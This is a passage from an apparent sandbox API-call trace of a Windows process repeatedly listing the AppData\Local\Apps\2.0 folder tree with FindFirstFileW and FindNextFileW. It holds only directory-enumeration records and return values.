ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0153.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec90) returned 1 [0153.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eccc) returned 1 [0153.122] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps", nBufferLength=0x105, lpBuffer=0x949e7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps", lpFilePart=0x0) returned 0x30 [0153.122] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\", nBufferLength=0x105, lpBuffer=0x949e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\", lpFilePart=0x0) returned 0x31 [0153.122] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*", lpFindFileData=0x949e9f4 | out: lpFindFileData=0x949e9f4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.123] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.123] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.0", cAlternateFileName="")) returned 1 [0153.123] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.0", cAlternateFileName="")) returned 0 [0153.123] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec8c) returned 1 [0153.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec98) returned 1 [0153.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eccc) returned 1 [0153.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps", nBufferLength=0x105, lpBuffer=0x949e7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps", lpFilePart=0x0) returned 0x30 [0153.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\", nBufferLength=0x105, lpBuffer=0x949e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\", lpFilePart=0x0) returned 0x31 [0153.124] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*", lpFindFileData=0x949e9f4 | out: lpFindFileData=0x949e9f4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.124] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.124] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.0", cAlternateFileName="")) returned 1 [0153.124] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.124] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec8c) returned 1 [0153.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec98) returned 1 [0153.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec7c) returned 1 [0153.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0", nBufferLength=0x105, lpBuffer=0x949e784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0", lpFilePart=0x0) returned 0x34 [0153.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\", nBufferLength=0x105, lpBuffer=0x949e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\", lpFilePart=0x0) returned 0x35 [0153.125] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*", lpFindFileData=0x949e9a4 | out: lpFindFileData=0x949e9a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.125] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.125] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1 [0153.125] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DQQ19BCJ.JAX", cAlternateFileName="")) returned 1 [0153.126] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DQQ19BCJ.JAX", cAlternateFileName="")) returned 0 [0153.126] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec3c) returned 1 [0153.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec48) returned 1 [0153.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec7c) returned 1 [0153.126] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0", nBufferLength=0x105, lpBuffer=0x949e784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0", lpFilePart=0x0) returned 0x34 [0153.126] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\", nBufferLength=0x105, lpBuffer=0x949e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\", lpFilePart=0x0) returned 0x35 [0153.126] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*", lpFindFileData=0x949e9a4 | out: lpFindFileData=0x949e9a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.126] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.126] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1 [0153.127] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DQQ19BCJ.JAX", cAlternateFileName="")) returned 1 [0153.127] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.127] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec3c) returned 1 [0153.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec48) returned 1 [0153.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec2c) returned 1 [0153.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data", nBufferLength=0x105, lpBuffer=0x949e734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data", lpFilePart=0x0) returned 0x39 [0153.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\", nBufferLength=0x105, lpBuffer=0x949e708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\", lpFilePart=0x0) returned 0x3a [0153.127] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*", lpFindFileData=0x949e954 | out: lpFindFileData=0x949e954*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.128] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.128] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CJW3O3KP.BX7", cAlternateFileName="")) returned 1 [0153.128] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CJW3O3KP.BX7", cAlternateFileName="")) returned 0 [0153.128] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebec) returned 1 [0153.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf8) returned 1 [0153.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec2c) returned 1 [0153.129] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data", nBufferLength=0x105, lpBuffer=0x949e734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data", lpFilePart=0x0) returned 0x39 [0153.129] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\", nBufferLength=0x105, lpBuffer=0x949e708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\", lpFilePart=0x0) returned 0x3a [0153.129] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*", lpFindFileData=0x949e954 | out: lpFindFileData=0x949e954*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.129] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.129] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CJW3O3KP.BX7", cAlternateFileName="")) returned 1 [0153.129] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.129] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebec) returned 1 [0153.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf8) returned 1 [0153.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0153.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7", lpFilePart=0x0) returned 0x46 [0153.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\", lpFilePart=0x0) returned 0x47 [0153.130] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.130] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.130] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6NG60CXZ.9GJ", cAlternateFileName="")) returned 1 [0153.130] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6NG60CXZ.9GJ", cAlternateFileName="")) returned 0 [0153.131] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0153.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0153.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0153.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7", lpFilePart=0x0) returned 0x46 [0153.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\", lpFilePart=0x0) returned 0x47 [0153.131] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.131] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, 